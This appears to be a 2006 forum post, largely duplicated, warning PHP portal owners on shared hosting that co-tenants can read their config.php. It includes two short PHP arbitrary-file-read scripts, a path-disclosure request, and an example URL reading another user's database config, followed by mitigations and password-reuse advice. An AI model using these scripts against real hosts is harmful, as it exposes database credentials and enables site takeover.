Security in shared web servers! be careful: everybody hack
Posted: Sun Jul 16, 2006 5:57 am
Hi
If your php portal install in a shared server you must be careful.
Other user that resident in your server (he has a hosting account on your server)can hack your portal!
How he can hack your portal?
By this script(script 1):
And by other one(script 2):
By these scripts , a user that resident in your server, can get your file or your code for exam he can get your config.php and see your database user & pass & name and down your data!!!
1- hacker must know your ID in your hosting so he recall one of php files that belong your portal in his browser:
for example:
after this requesting; he see any error report like this:
Now he find your ID
2- Now he use one of these script for exam script 1 like in this case:
then he watch page source and read your db config informations!
3- by using a simple script he can download your db or he can write in your db and …
he can install the same portal and edit and change some code then he can use your encrypted-admin-password and login some times and…
how we can solve this problem?
1- we must add this codes to prologue of all php files:
so hacker can not find your ID. And you can see error-log in Cpanel of your linux hosting.
2- You must rename your config.php file and edit all php file which include or require config.php file. Then you must encrypt these files by using zend-phpencoder or any other encoder programs.
So if a hacker find your ID he will not find your db config file
3- or using a dedicated server only for own.
In phpnuke if using nuke sentinel and IP-trakcer be on then all users' usernames and passwords ( even admin) insert in nuke_nsnst_tracked_ips !!!
So nuke owner or a hacker can see users password.
If you want register in portals you must use different password.
If your password is equal with your other important thing for exam equal with your email pass or domain-panel pass or your bank account hacker or nuke website owner can access that!
In other portals, owner can change scripts codes and find your password.
If your php portal install in a shared server you must be careful.
Other user that resident in your server (he has a hosting account on your server)can hack your portal!
How he can hack your portal?
By this script(script 1):
Code: Select all
<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>Code: Select all
<?php
header('Content-Type: text/plain');
readfile($_GET['a']);
?>1- hacker must know your ID in your hosting so he recall one of php files that belong your portal in his browser:
for example:
Code: Select all
http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=textCode: Select all
/home/yourID/public_html/forum/includes/functions.php error 607 in line 5632- Now he use one of these script for exam script 1 like in this case:
Code: Select all
http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php3- by using a simple script he can download your db or he can write in your db and …
he can install the same portal and edit and change some code then he can use your encrypted-admin-password and login some times and…
how we can solve this problem?
1- we must add this codes to prologue of all php files:
Code: Select all
ini_set('display_errors', 'Off');
ini_set('log_errors', 'On');2- You must rename your config.php file and edit all php file which include or require config.php file. Then you must encrypt these files by using zend-phpencoder or any other encoder programs.
So if a hacker find your ID he will not find your db config file
3- or using a dedicated server only for own.
In phpnuke if using nuke sentinel and IP-trakcer be on then all users' usernames and passwords ( even admin) insert in nuke_nsnst_tracked_ips !!!
So nuke owner or a hacker can see users password.
If you want register in portals you must use different password.
If your password is equal with your other important thing for exam equal with your email pass or domain-panel pass or your bank account hacker or nuke website owner can access that!
In other portals, owner can change scripts codes and find your password.